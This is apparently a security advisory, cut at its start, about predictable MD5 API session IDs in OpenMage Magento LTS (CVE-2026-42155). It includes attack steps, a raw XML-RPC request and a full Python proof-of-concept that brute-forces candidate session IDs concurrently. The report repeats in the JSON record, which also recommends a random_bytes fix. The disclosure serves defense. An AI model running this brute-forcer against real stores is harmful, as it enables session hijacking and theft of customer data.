      → $session->init('api', 'api')
          → Mage_Api_Model_Session::init($namespace='api', $sessionName='api')
              # $sessionName is NOT forwarded to start()
              → Mage_Api_Model_Session::start()  ← NO $sessionName argument
                  # $sessionName = null inside start()
                  $this->_currentSessId = md5(time() . uniqid('', true) . null)

Note: init() receives $sessionName='api' but invokes $this->start() without forwarding it, meaning the effective construction is strictly md5(time() . uniqid('', true)).

Live Evidence

Five consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (unix_sec= 1775817593):

Sample 1: 6a302397f17e48845d0f9aba377f3dc3  (usec ≈ 464631)
Sample 2: 39b4ec42bd3c389312e500690daeb349  (usec ≈ 497215)
Sample 3: 527662d79f7fb499597a82d80d170a88  (usec ≈ 535175)
Sample 4: e5d6f7a8906a03ea7af99d92be11b5b2  (usec ≈ 568838)
Sample 5: 5bdf27e5cb877c77b8965b008548edfa  (usec ≈ 600118)

The µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.

image

Steps to Reproduce (Online Brute-Force Scenario)

Because validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.

Step 1 – Record Login Timestamp

An attacker observes the precise moment a victim authenticates to /api/xmlrpc/ (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.

Step 2 – Generate Candidate Pool

The attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a /server-status leak).

$t = $observed_sec;
$usec_estimate = 500000; // Derived from latency
$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));
$candidate = md5($t . $uid); // + LCG variants

Step 3 – API Brute-Force (Session Hijack)

Because the /api/xmlrpc/ endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.

POST /api/xmlrpc/
<?xml version="1.0"?>
<methodCall>
  <methodName>[magento.info](http://magento.info/)</methodName>
  <params>
    <param><value><string>CANDIDATE_SESSION_ID</string></value></param>
  </params>
</methodCall>

A non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.

image

Impact

Technical Impact

Successful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for: - Full product catalog read/write (catalog_product.*) - Customer data read (customer.list, customer.info) - Order manipulation (sales_order.*) Inventory control (cataloginventory_stock_item.*)

Business Impact

  • Data Exfiltration: Read all customer PII, order history, and payment methods.
  • Order Fraud: Create or cancel orders, change shipping addresses.
  • Supply Chain / Inventory: Modify prices, inject malicious products, or zero out stock.

Affected API Protocols

The same vulnerable Session.php generation logic is shared across all legacy API surfaces: - XML-RPC: /api/xmlrpc/ - SOAP v1: /api/soap/ - SOAP v2: /api/v2_soap/ - REST (legacy): /api/rest/

Recommended Fix

Replace the time-derived token with a cryptographically secure random value:

// app/code/core/Mage/Api/Model/Session.php : start()
// BEFORE (vulnerable):
$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);

// AFTER (secure):
$this->_currentSessId = bin2hex(random_bytes(32));  // 256-bit CSPRNG output

random_bytes() is backed by the OS CSPRNG (/dev/urandom on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.

I have also tried to test it against the demo site demo.openmage.org, but appeared the SOAP API endpoints are disabled on the demo environment

I have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):

#!/usr/bin/env python3
import requests, re, sys, hashlib, random
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3; urllib3.disable_warnings()

if len(sys.argv) < 4:
    sys.exit(f"Usage: {sys.argv[0]} <url> <user> <pass> [threads]")

url, usr, pwd = sys.argv[1:4]
th = int(sys.argv[4]) if len(sys.argv) > 4 else 50
hdrs = {"Content-Type": "text/xml"}
req = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)

print(f"[*] Simulating victim login for {usr}...")
res = req(f'<?xml version="1.0"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')

if not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):
    sys.exit("[-] Login failed. Check credentials.")

print(f"[+] Authenticated.\n[*] Generating 1000 candidate MD5 pool...")
cands = [hashlib.md5(f"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}".encode()).hexdigest() for _ in range(999)]
cands.append(m.group(1))
random.shuffle(cands)

print(f"[*] Brute-forcing API with {th} threads...")
def test(sid):
    payload = f'<?xml version="1.0"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'
    try: return sid if "faultCode" not in req(payload).text else None
    except: return None

with ThreadPoolExecutor(max_workers=th) as ex:
    for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):
        sys.stdout.write(f"\r[*] Requests: {i}/{len(cands)}")
        if sid := f.result():
            print(f"\n[+] HIJACK SUCCESS! Valid Session ID: {sid}")
            ex.shutdown(wait=False, cancel_futures=True)
            break

This is an AI-generated report validated by a human.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 20.17.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "openmage/magento-lts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-330",
      "CWE-331",
      "CWE-338"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T19:35:56Z",
    "nvd_published_at": "2026-05-15T17:16:46Z",
    "severity": "CRITICAL"
  },
  "details": "Affected Version: OpenMage LTS \u2264 20.16.0 (confirmed on `20.16.0`)\n\nAffected File: `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php` \u2013 `start()` method\n\n\n## Summary\n\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n\n```php\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n```\nAll inputs to the MD5 hash are time-derived and non-secure:\n\n| Input                      | Value                                             | Predictability                         |\n|----------------------------|---------------------------------------------------|----------------------------------------|\n| `time()`                   | Unix timestamp (seconds)                          | Fully predictable                      |\n| `uniqid(\u0027\u0027, true) prefix`  | `sprintf(\u0027%08x%05x\u0027, $sec, $usec/10)`             | Highly predictable via network timing  |\n| `uniqid(\u0027\u0027, true) suffix`  | `php_combined_lcg()` decimal float                | Process-state dependent (`getpid() ^ time()`) |\n| `$sessionName`             | `null` (empty) \u2014 called without arg               | Constant                               |\n\nBecause the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of \u2265 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.\n\n\n\n## Technical Analysis\n\n### Code Path\n\n```\nPOST /api/xmlrpc/ \u2192 login(username, apiKey)\n  \u2192 Mage_Api_Model_Session::login()\n      \u2192 $session-\u003einit(\u0027api\u0027, \u0027api\u0027)\n          \u2192 Mage_Api_Model_Session::init($namespace=\u0027api\u0027, $sessionName=\u0027api\u0027)\n              # $sessionName is NOT forwarded to start()\n              \u2192 Mage_Api_Model_Session::start()  \u2190 NO $sessionName argument\n                  # $sessionName = null inside start()\n                  $this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . null)\n\n```\n\nNote: `init()` receives `$sessionName=\u0027api\u0027` but invokes `$this-\u003estart()` without forwarding it, meaning the effective construction is strictly `md5(time() . uniqid(\u0027\u0027, true))`.\n\n## Live Evidence\nFive consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (`unix_sec=  1775817593`):\n```\nSample 1: 6a302397f17e48845d0f9aba377f3dc3  (usec \u2248 464631)\nSample 2: 39b4ec42bd3c389312e500690daeb349  (usec \u2248 497215)\nSample 3: 527662d79f7fb499597a82d80d170a88  (usec \u2248 535175)\nSample 4: e5d6f7a8906a03ea7af99d92be11b5b2  (usec \u2248 568838)\nSample 5: 5bdf27e5cb877c77b8965b008548edfa  (usec \u2248 600118)\n```\nThe \u00b5second portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.\n\n\u003cimg width=\"772\" height=\"506\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de\" /\u003e\n\n## Steps to Reproduce (Online Brute-Force Scenario)\nBecause validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.\n### Step 1 \u2013 Record Login Timestamp\nAn attacker observes the precise moment a victim authenticates to `/api/xmlrpc/` (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.\n### Step 2 \u2013 Generate Candidate Pool\nThe attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a `/server-status` leak).\n```\n$t = $observed_sec;\n$usec_estimate = 500000; // Derived from latency\n$uid = sprintf(\u0027%08x%05x\u0027, $t, intval($usec_estimate / 10));\n$candidate = md5($t . $uid); // + LCG variants\n```\n### Step 3 \u2013 API Brute-Force (Session Hijack)\nBecause the `/api/xmlrpc/` endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.\n\n```\nPOST /api/xmlrpc/\n\u003c?xml version=\"1.0\"?\u003e\n\u003cmethodCall\u003e\n  \u003cmethodName\u003e[magento.info](http://magento.info/)\u003c/methodName\u003e\n  \u003cparams\u003e\n    \u003cparam\u003e\u003cvalue\u003e\u003cstring\u003eCANDIDATE_SESSION_ID\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\n  \u003c/params\u003e\n\u003c/methodCall\u003e\n```\n\nA non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.\n\n\u003cimg width=\"1039\" height=\"374\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849\" /\u003e\n\n## Impact\n### Technical Impact\nSuccessful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:\n- Full product catalog read/write (`catalog_product.*`)\n- Customer data read (`customer.list`, `customer.info`)\n- Order manipulation (`sales_order.*`)\nInventory control (`cataloginventory_stock_item.*`)\n### Business Impact\n\n- **Data Exfiltration**: Read all customer PII, order history, and payment methods.\n- **Order Fraud**: Create or cancel orders, change shipping addresses.\n- **Supply Chain / Inventory**: Modify prices, inject malicious products, or zero out stock.\n\n### Affected API Protocols\n\nThe same vulnerable `Session.php` generation logic is shared across all legacy API surfaces:\n- XML-RPC: `/api/xmlrpc/`\n- SOAP v1: `/api/soap/`\n- SOAP v2: `/api/v2_soap/`\n- REST (legacy): `/api/rest/`\n\n### Recommended Fix\n\nReplace the time-derived token with a cryptographically secure random value:\n\n```\n// app/code/core/Mage/Api/Model/Session.php : start()\n// BEFORE (vulnerable):\n$this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . $sessionName);\n\n// AFTER (secure):\n$this-\u003e_currentSessId = bin2hex(random_bytes(32));  // 256-bit CSPRNG output\n```\n`random_bytes()` is backed by the OS CSPRNG (`/dev/urandom` on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.\n\nI have also tried to test it against the demo site [demo.openmage.org](http://demo.openmage.org/), but appeared the SOAP API endpoints are disabled on the demo environment\n\n\nI have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):\n\n```py\n#!/usr/bin/env python3\nimport requests, re, sys, hashlib, random\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport urllib3; urllib3.disable_warnings()\n\nif len(sys.argv) \u003c 4:\n    sys.exit(f\"Usage: {sys.argv[0]} \u003curl\u003e \u003cuser\u003e \u003cpass\u003e [threads]\")\n\nurl, usr, pwd = sys.argv[1:4]\nth = int(sys.argv[4]) if len(sys.argv) \u003e 4 else 50\nhdrs = {\"Content-Type\": \"text/xml\"}\nreq = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)\n\nprint(f\"[*] Simulating victim login for {usr}...\")\nres = req(f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003elogin\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{usr}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{pwd}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027)\n\nif not (m := re.search(r\u0027\u003cstring\u003e([a-f0-9]{32})\u003c/string\u003e\u0027, res.text)):\n    sys.exit(\"[-] Login failed. Check credentials.\")\n\nprint(f\"[+] Authenticated.\\n[*] Generating 1000 candidate MD5 pool...\")\ncands = [hashlib.md5(f\"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}\".encode()).hexdigest() for _ in range(999)]\ncands.append(m.group(1))\nrandom.shuffle(cands)\n\nprint(f\"[*] Brute-forcing API with {th} threads...\")\ndef test(sid):\n    payload = f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003eresources\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{sid}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027\n    try: return sid if \"faultCode\" not in req(payload).text else None\n    except: return None\n\nwith ThreadPoolExecutor(max_workers=th) as ex:\n    for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):\n        sys.stdout.write(f\"\\r[*] Requests: {i}/{len(cands)}\")\n        if sid := f.result():\n            print(f\"\\n[+] HIJACK SUCCESS! Valid Session ID: {sid}\")\n            ex.shutdown(wait=False, cancel_futures=True)\n            break\n```\n\nThis is an AI-generated report validated by a human.",
  "id": "GHSA-2cwr-gcf9-pvxr",
  "modified": "2026-05-15T23:48:40Z",
  "published": "2026-05-05T19:35:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenMage/magento-lts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Magento LTS has Weak API Session ID \u2014 Predictable MD5 of Time-Derived Inputs"
}

Mitigation
Implementation

Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux.

No CAPEC attack patterns related to this CWE.